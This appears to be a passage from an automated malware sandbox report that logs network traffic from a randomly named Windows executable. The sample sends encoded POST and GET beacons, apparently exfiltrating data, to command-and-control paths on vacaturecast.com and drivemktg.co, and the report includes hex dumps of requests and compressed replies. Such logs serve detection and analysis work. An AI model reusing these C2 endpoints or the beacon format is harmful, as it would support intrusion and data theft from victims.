                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 61 63 6f 70 6f 64 63 61 73 74 2e 6e 6c 2f 73 69 64 38 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 76 61 63 61 74 75 72 65 63 61 73 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.104971591.184.0.111804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:24.665750980 CEST1771OUTPOST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 52 69 43 32 53 47 59 64 6c 61 52 4b 54 45 5a 41 32 71 67 6e 33 6a 41 6e 6d 31 4a 70 6f 73 64 36 4b 55 2f 6c 4c 62 56 43 55 41 4d 65 55 51 42 36 2f 37 35 4f 31 2b 66 34 54 38 73 33 45 6f 31 64 67 46 4d 38 48 47 78 65 62 74 59 49 58 48 46 43 76 4e 71 52 65 47 66 30 7a 6c 33 55 38 2f 67 66 53 4e 71 50 6b 32 73 34 53 6d 74 69 36 6f 52 49 59 38 6c 72 78 71 38 6b 34 2f 6a 38 43 2b 5a 34 75 4f 6c 76 76 30 79 45 51 67 74 33 36 35 4f 4d 36 33 58 65 46 6e 63 77 4a 69 45 69 63 50 67 4f 75 51 72 74 52 4a 50 7a 6d 42 6e 34 77 66 6b 5a 6e 43 39 45 2f 35 57 45 75 74 76 6f 61 66 54 4e 4b 53 4d 49 77 50 38 48 56 68 79 39 2b 49 5a 72 6b 62 4e 79 43 41 6d 76 4f 77 42 4c 44 63 63 63 54 4d 64 58 45 72 45 46 76 4b 67 64 46 56 53 4f 5a 68 62 46 77 49 73 67 51 4a 67 61 79 6e 2f 36 67 55 75 4d 77 78 6a 41 61 4a 4f 43 61 43 58 31 51 58 55 78 51 33 53 62 64 79 44 4a 43 74 4b 64 56 38 54 6d 5a 33 58 49 53 2b 7a 34 79 33 42 43 55 45 58 33 68 52 54 39 76 38 39 50 69 5a 78 47 4e 30 44 52 4d 6a 41 35 41 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=RiC2SGYdlaRKTEZA2qgn3jAnm1Jposd6KU/lLbVCUAMeUQB6/75O1+f4T8s3Eo1dgFM8HGxebtYIXHFCvNqReGf0zl3U8/gfSNqPk2s4Smti6oRIY8lrxq8k4/j8C+Z4uOlvv0yEQgt365OM63XeFncwJiEicPgOuQrtRJPzmBn4wfkZnC9E/5WEutvoafTNKSMIwP8HVhy9+IZrkbNyCAmvOwBLDcccTMdXErEFvKgdFVSOZhbFwIsgQJgayn/6gUuMwxjAaJOCaCX1QXUxQ3SbdyDJCtKdV8TmZ3XIS+z4y3BCUEX3hRT9v89PiZxGN0DRMjA5A1mgXm9y2Tt2ePdR37qgzZ+s24sBV4wUiE/zTRRvnhVL3P/VpSrb0tLoPEfN+WUCkn3wzpD5xI0GmHm4PRMbi74b8klTgyfMTn3eN+F2OzjVbnytrUdwUS7St/0zh5EsiK7x3fkdpuxZ1DxDj9hQ8MtU/QViOSqp02fWvu8p3qd1D2igXxtUrsaVMIIiDDg4DhoKF2wcgkbkkJDx3lXfXNVVLlNlKKi2F3Sb+ir2iIUDddPU8dlk4SwL+THtNTy1/BuSd86hIsz5yvQbIRNqfZ5jZz1rx5aTpGJPggKgUNohFcxk1EXci2LpjU+RrWfQw9GFhPiSaKZLP43Z9mPZgz96NXvGoaNUSZQPRbenU4gXCkBIR/h5oZIlE/ML1fNDqKGRUEMlabKihGvxPvlIL2z5hrlvJhqLCbHQ+1wxzJ7CtRjJWQxtBITxvPTXro63pxfrexxgYcxp8d0UIEJ+F+AKpdaRXmcasKZBHU4hjSzZCJPvaLedZlU1YIyOgakj5277UDvj9BC7LxASvEuETrlQj3kcBkgx5cI++shr0CgchUuqFDiEwCnExkKexhacqPds4mJL5mTFlRU/g+F4/8yBEVWisxf+Es/3of7uvFeqhVevUSniASMz8YJEEqzeU2IRkvulJ2XLejjNydTVyd9Teq4tfQ8gQav [TRUNCATED]
                                                          Sep 11, 2024 22:03:25.415575027 CEST546INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:25 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 61 63 6f 70 6f 64 63 61 73 74 2e 6e 6c 2f 73 69 64 38 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 76 61 63 61 74 75 72 65 63 61 73 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.104971691.184.0.111804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:27.200853109 CEST463OUTGET /sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:27.843063116 CEST830INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:27 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 449
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8
                                                          X-Powered-By: PleskLin
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 61 63 6f 70 6f 64 63 61 73 74 2e 6e 6c 2f 73 69 64 38 2f 3f 62 46 47 58 47 54 64 58 3d 63 67 71 57 52 78 42 48 69 73 5a 45 66 6b 34 62 37 59 52 38 39 67 70 45 75 77 6b 35 6f 38 55 48 48 6c 47 6a 41 72 68 2f 62 77 67 68 46 54 52 35 68 70 45 2f 2b 65 44 49 4b 76 34 37 4c 61 64 56 69 69 4a 4e 41 30 6c 39 55 37 41 4a 63 45 59 6f 36 2f 44 4a 49 6c 6e 45 33 31 32 4c 38 2b 4a 46 64 75 6d 57 6c 48 4d 31 4c 47 74 6b 72 2f 74 36 62 67 3d 3d 26 61 6d 70 3b 4d 38 37 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&amp;M87d=RDddFbF8">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.1049717193.108.130.23804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:33.556015015 CEST722OUTPOST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 64 57 49 44 6d 61 46 4d 4a 64 7a 46 61 31 66 56 64 4e 67 6e 46 6f 39 4b 31 6b 2b 2b 46 45 78 76 2b 74 73 62 6b 63 64 69 42 46 64 75 73 6f 74 6d 56 38 74 34 54 69 2b 42 6e 70 38 63 73 30 4d 39 5a 64 70 35 4c 64 77 6d 41 72 6f 6e 50 55 4f 74 77 6d 56 32 61 6d 4e 4c 6a 65 42 61 2f 2f 53 62 6a 2f 35 34 6f 56 6c 65 69 38 2b 51 68 30 49 2b 59 31 6f 65 7a 59 38 73 52 31 37 31 6e 69 42 53 79 38 42 4d 59 57 5a 68 4d 78 42 31 6c 2f 6e 6c 65 42 45 61 66 6f 52 32 41 2f 4e 79 6b 34 73 56 71 2b 48 6d 6c 65 51 4f 54 69 56 45 75 73 4f 31 52 67 68 32 53 79 78 47 32 4c 64 73
                                                          Data Ascii: bFGXGTdX=dWIDmaFMJdzFa1fVdNgnFo9K1k++FExv+tsbkcdiBFdusotmV8t4Ti+Bnp8cs0M9Zdp5LdwmAronPUOtwmV2amNLjeBa//Sbj/54oVlei8+Qh0I+Y1oezY8sR171niBSy8BMYWZhMxB1l/nleBEafoR2A/Nyk4sVq+HmleQOTiVEusO1Rgh2SyxG2Lds
                                                          Sep 11, 2024 22:03:34.587290049 CEST1236INHTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          transfer-encoding: chunked
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:11 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 32 33 62 62 0d 0a 30 b4 2d a2 aa d6 43 46 a4 26 f5 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe db 2f ab ef ce cf 17 61 ab 0c 4c 23 9a a4 af 35 c3 1c d7 69 d7 16 ea d3 d0 ad e0 c2 33 47 d9 4e be aa fe 77 f3 f3 85 a3 4f 2f 62 1f 40 61 73 28 76 86 33 ea 66 38 8d 3b b6 0e 24 41 0a 36 48 a2 00 28 51 d6 f9 ff f7 97 e6 39 5b 22 9e 3e e5 6e 51 06 48 30 33 c6 32 08 ed 76 09 df 07 e7 64 46 52 61 2a 44 85 64 bb 10 15 e4 02 ef bb f7 c1 cc 9f 2f 5e 90 65 ad 11 b5 c4 d4 a6 4c 6d 19 02 00 55 da 34 c5 68 42 0a 70 c5 50 e5 6c d1 36 79 0c 67 3d c3 40 24 8c 95 6e cb 98 d6 db de da af 90 0d 22 44 50 1f c3 a1 7b a6 35 0b c4 98 c2 6f 53 08 58 f0 c1 ec fe 16 bb b6 f7 aa a3 2b 0a 36 fe fe 75 1e 87 f3 25 84 90 fb 1d e0 7a f2 b7 05 40 45 17 fe 2e ad 3f 76 ad b1 b7 c4 43 ab 68 ef 5d 6d 5a 18 d4 fa b1 6a ba be 91 ce 37 c9 a1 b6 c9 72 e9 f5 cc 19 db 14 ba bc dd 3f 8a ca 9b 1d 74 b7 d8 c8 d2 25 87 ae f5 7d 29 fb 6d 4f 1f cc a4 ea 51 16 ad b6 b7 24 fa e7 6a b5 5c 6e c8 33 6f 76 40 de 6b 7f 0b 68 6c 43 84 6b 97 c8 a7 ad 69 4d df 1b 0b a1 [TRUNCATED]
                                                          Data Ascii: 23bb0-CF&h,/aL#5i3GNwO/b@as(v3f8;$A6H(Q9[">nQH032vdFRa*Dd/^eLmU4hBpPl6yg=@$n"DP{5oSX+6u%z@E.?vCh]mZj7r?t%})mOQ$j\n3ov@khlCkiM3s\,+l!6n ^Pg$folV,Y<L<FlLgBT6#/*GJ(NSu`1 $2l:wcM f5O$tY(OJ!O|dy.Sr'TP8 4AYv1#KHKgK0eC5ZdHCCZdgw+:MYrob"|[eFX>
                                                          Sep 11, 2024 22:03:34.587312937 CEST224INData Raw: 27 4e 04 01 1b bb 85 49 c9 80 8f e8 8f f6 f5 a8 c6 e6 11 97 fa 06 01 43 06 22 33 aa ca 92 fc 39 5c f6 a6 f7 fd f0 b1 66 7c da 04 08 c1 38 fb 15 9d d7 0d c8 00 f8 1a a1 63 4e bc f9 fa f1 83 0c e8 8d 6d 4c 7d 64 c8 f9 94 b6 d7 8f d3 84 c2 58 7b 06
                                                          Data Ascii: 'NIC"39\f|8cNmL}dX{#F(" Kmw:Vj!nq6mP"H|'@6;3(Yi\x:NEu 0J)'N{-C>:[a
                                                          Sep 11, 2024 22:03:34.587327957 CEST1236INData Raw: f9 50 43 5a e7 c3 2a 4d ab 7c 58 5d e8 4b d3 78 d4 69 e9 e2 4c f0 87 f3 65 36 07 3d b4 aa f5 f7 01 d7 d4 5a 00 c2 8e 86 e3 51 74 fb 70 eb fa 2c 1f aa e2 2c cd 87 aa bc b8 fc 5e 72 55 f2 3c 06 f8 89 ba 8c 4d d5 19 0a d8 03 65 5a f6 aa ec f3 53 06
                                                          Data Ascii: PCZ*M|X]KxiLe6=ZQtp,,^rU<MeZS9d 8KTPk+>'(YK\_N{ls\M~:e~-]Q-C{C.NS<Oyf.*R.**i/b{SLK>ZcAQt=
                                                          Sep 11, 2024 22:03:34.587376118 CEST1236INData Raw: 96 51 a3 fc ed 8d 6a a8 b5 af c0 45 d7 d4 bb ab 30 fd 3e a2 de 6b 3d 52 e6 e2 ae c0 45 5e b7 4d 2d 62 60 7a 39 3b 31 6e 71 c1 b7 84 51 04 df 8b 75 05 2e 0a dd 92 ae 81 6f f8 38 89 b1 2c 99 66 1f 45 37 7b 67 75 05 2e ca 5a 10 1d cf 0b dd 7b d5 1a
                                                          Data Ascii: QjE0>k=RE^M-b`z9;1nqQu.o8,fE7{gu.Z{=P,`-0Vk!9$)+zMWi$%&BJ1$]rR\@uAqB"f5B@LQ;r6uBq6Xb%$
                                                          Sep 11, 2024 22:03:34.587404966 CEST1236INData Raw: 0d d2 d0 75 dd b6 d0 af 8f 0f 63 4e 05 8e 14 aa 6a bb 25 80 66 43 da 53 95 f1 2a ac 14 ca dd ab 40 a3 6c b3 c6 99 94 b9 1e c0 ff 01 75 4b 3a ff 44 92 31 c6 a2 b7 cc 5f cd 38 8d 7a fb 94 ed 55 a8 51 15 b5 74 15 67 2a 91 45 aa ad 0f 59 2d 07 e1 23
                                                          Data Ascii: ucNj%fCS*@luK:D1_8zUQtg*EY-#l-"H2**gnBE.Unt_m|-`_>#QCDg9!k@{@E_-Nj.DD;i.}H@{23;9nDs}!qS.)~r
                                                          Sep 11, 2024 22:03:34.587430954 CEST672INData Raw: 99 e7 94 57 c7 b4 d9 d8 4d 63 2c d5 cc ae 9e 3f 0e 79 0e 41 87 60 f9 b6 91 a0 e4 2f 7d d6 f9 00 67 47 98 bb ce 2c 55 20 e3 c2 3e a6 f9 ee 69 e6 57 27 ab 63 d4 de 91 7c 90 0a 83 98 6b cd a8 5d 5f 96 4b b2 92 3c 75 64 9e e0 d1 72 97 92 63 bf 8f 09
                                                          Data Ascii: WMc,?yA`/}gG,U >iW'c|k]_K<udrcCO}s0O +X@,noe Na($t$='Ndb:uU^GH\N#e%{mR_i+MD0'F*pL!S2$`ND2Fdj8$
                                                          Sep 11, 2024 22:03:34.587446928 CEST1236INData Raw: 51 69 83 9b 50 28 bb c9 fd 5e 9e 98 b0 c5 14 06 0c 51 49 3b 00 cf 92 06 fd 98 4a 79 88 8c 26 9b 19 c9 c8 84 65 77 e4 54 5a e6 13 9c 04 91 7c 96 b4 46 2b e6 90 bd da b1 e0 9e 36 ca 93 f1 04 45 61 98 22 6f cc 84 42 d9 4d ee f7 f2 64 e1 4e 61 e4 42
                                                          Data Ascii: QiP(^QI;Jy&ewTZ|F+6Ea"oBMdNaBc'C+d:@qi3`G0rhh+LcC,eB#&l`fg%bR*K9TNzG6"4F=eyF.wP3yN" *tZsY\gLt"7\=;(
                                                          Sep 11, 2024 22:03:34.587464094 CEST1236INData Raw: 94 c0 57 2d e4 ce e5 81 a3 a9 d0 ff 73 c9 af be 27 c5 cd 32 c3 43 f2 fd ae a3 35 3f d5 28 b0 95 1a ff f1 33 de 66 07 13 3b 97 38 e5 f5 18 5b 29 05 34 d4 fc 24 87 56 19 02 be 07 bd 91 c8 66 61 d4 fa 56 85 9a ab 3e 44 42 40 48 8e dd 92 a6 ad 8c ce
                                                          Data Ascii: W-s'2C5?(3f;8[)4$VfaV>DB@H\F0USM$c}N-VV763UD/6&mh_[>}2Fe^BVSu\va)_eYP<IS$PRg/Hz%VPj%CB
                                                          Sep 11, 2024 22:03:34.587480068 CEST1236INData Raw: bd 03 c1 8c bd d5 3f de 25 e4 54 af 81 9b 42 34 2d 22 18 1c 5d dd 3d 88 13 88 5f 3b 06 d3 ea 5a 79 9e d4 e6 82 da 3f 0a 3c 00 52 0f 80 e4 03 cb b4 e6 c0 81 c0 aa 7e 9a e2 cc b6 34 d0 07 16 24 5a 95 b5 c9 95 2c 0f b0 2e f0 d8 1c ff 60 df 3c de 69
                                                          Data Ascii: ?%TB4-"]=_;Zy?<R~4$Z,.`<i#eQb6E\BxDz#S=PbDnq{R}zcN;h=- 5gF|!~l/oZ2806?>[Srb\G2Pa7:bJ{lI
                                                          Sep 11, 2024 22:03:34.587493896 CEST207INData Raw: cf 57 19 84 1f ef 69 27 f8 17 8b 4e 22 18 6c 23 3d 29 c5 d5 59 40 5e 3b 7b 12 54 0a 36 d0 33 ed 35 a1 fb 90 80 0e 34 51 32 af ed e8 50 88 5e 45 dd 9f 3a d6 b8 20 11 74 2f 68 a3 5f 35 fb 56 43 ad a9 d1 8f fe a7 1c cc b8 4c 7e 5c 7f 74 ff 5f 92 b8
                                                          Data Ascii: Wi'N"l#=)Y@^;{T6354Q2P^E: t/h_5VCL~\t_&_W<OW6as#Z?Dq{-07NN/y4Tu9mHH+L%*!XHL&3@pi5.Bg
                                                          Sep 11, 2024 22:03:34.588038921 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 10


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.1049718193.108.130.23804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:03:36.094854116 CEST746OUTPOST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 64 57 49 44 6d 61 46 4d 4a 64 7a 46 62 56 50 56 66 72 6f 6e 4f 6f 39 4a 77 6b 2b 2b 4d 6b 78 72 2b 74 67 62 6b 5a 39 79 42 58 4a 75 73 49 39 6d 48 6f 78 34 53 69 2b 42 70 4a 38 56 69 55 4d 32 5a 64 74 62 4c 63 4d 6d 41 6f 55 6e 50 57 6d 74 77 78 4a 31 59 32 4e 4e 76 2b 42 45 6e 66 53 62 6a 2f 35 34 6f 56 41 44 69 39 57 51 68 48 41 2b 61 55 6f 5a 2f 34 38 6a 57 31 37 31 78 53 41 62 79 38 41 70 59 58 45 4d 4d 79 70 31 6c 2b 58 6c 65 56 59 64 57 6f 52 38 4f 66 4d 4f 6e 36 68 71 6c 73 62 63 69 66 38 4e 46 6a 6f 74 6b 74 76 79 41 78 41 68 42 46 74 49 34 4e 6f 47 6a 62 52 52 65 4c 68 57 35 31 51 52 59 50 34 6f 39 73 42 34 35 67 3d 3d
                                                          Data Ascii: bFGXGTdX=dWIDmaFMJdzFbVPVfronOo9Jwk++Mkxr+tgbkZ9yBXJusI9mHox4Si+BpJ8ViUM2ZdtbLcMmAoUnPWmtwxJ1Y2NNv+BEnfSbj/54oVADi9WQhHA+aUoZ/48jW171xSAby8ApYXEMMyp1l+XleVYdWoR8OfMOn6hqlsbcif8NFjotktvyAxAhBFtI4NoGjbRReLhW51QRYP4o9sB45g==
                                                          Sep 11, 2024 22:03:37.143892050 CEST1236INHTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          content-length: 9147
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:13 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 62 68 3b a2 aa d6 43 46 a4 26 f5 00 68 a4 2c 9c bf 7f 84 0e 9f f3 fe db 2f ab ef ce cf 17 61 ab 0c 4c 23 9a a4 af 35 c3 1c d7 69 d7 16 ea d3 d0 ad e0 c2 33 47 d9 4e be aa fe 77 f3 f3 85 a3 4f 2f 62 1f 40 61 73 28 76 86 33 ea 66 38 8d 3b b6 0e 24 41 0a 36 48 a2 00 28 51 d6 f9 ff f7 97 e6 39 5b 22 9e 3e e5 6e 51 06 48 30 33 c6 32 08 ed 76 09 df 07 e7 64 46 52 61 2a 44 85 64 bb 10 15 e4 02 ef bb f7 c1 cc 9f 2f 5e 90 65 ad 11 b5 c4 d4 a6 4c 6d 19 02 00 55 da 34 c5 68 42 0a 70 c5 50 e5 6c d1 36 79 0c 67 3d c3 40 24 8c 95 6e cb 98 d6 db de da af 90 0d 22 44 50 1f c3 a1 7b a6 35 0b c4 98 c2 6f 53 08 58 f0 c1 ec fe 16 bb b6 f7 aa a3 2b 0a 36 fe fe 75 1e 87 f3 25 84 90 fb 1d e0 7a f2 b7 05 40 45 17 fe 2e ad 3f 76 ad b1 b7 c4 43 ab 68 ef 5d 6d 5a 18 d4 fa b1 6a ba be 91 ce 37 c9 a1 b6 c9 72 e9 f5 cc 19 db 14 ba bc dd 3f 8a ca 9b 1d 74 b7 d8 c8 d2 25 87 ae f5 7d 29 fb 6d 4f 1f cc a4 ea 51 16 ad b6 b7 24 fa e7 6a b5 5c 6e c8 33 6f 76 40 de 6b 7f 0b 68 6c 43 84 6b 97 c8 a7 ad 69 4d df 1b 0b a1 f5 33 73 5c d3 f9 [TRUNCATED]
                                                          Data Ascii: bh;CF&h,/aL#5i3GNwO/b@as(v3f8;$A6H(Q9[">nQH032vdFRa*Dd/^eLmU4hBpPl6yg=@$n"DP{5oSX+6u%z@E.?vCh]mZj7r?t%})mOQ$j\n3ov@khlCkiM3s\,+l!6n ^Pg$folV,Y<L<FlLgBT6#/*GJ(NSu`1 $2l:wcM f5O$tY(OJ!O|dy.Sr'TP8 4AYv1#KHKgK0eC5ZdHCCZdgw+:MYrob"|[eFX>'NI
                                                          Sep 11, 2024 22:03:37.143923998 CEST1236INData Raw: 8f f6 f5 a8 c6 e6 11 97 fa 06 01 43 06 22 33 aa ca 92 fc 39 5c f6 a6 f7 fd f0 b1 66 7c da 04 08 c1 38 fb 15 9d d7 0d c8 00 f8 1a a1 63 4e bc f9 fa f1 83 0c e8 8d 6d 4c 7d 64 c8 f9 94 b6 d7 8f d3 84 c2 58 7b 06 02 85 e5 23 c8 46 ae ef c5 17 28 91
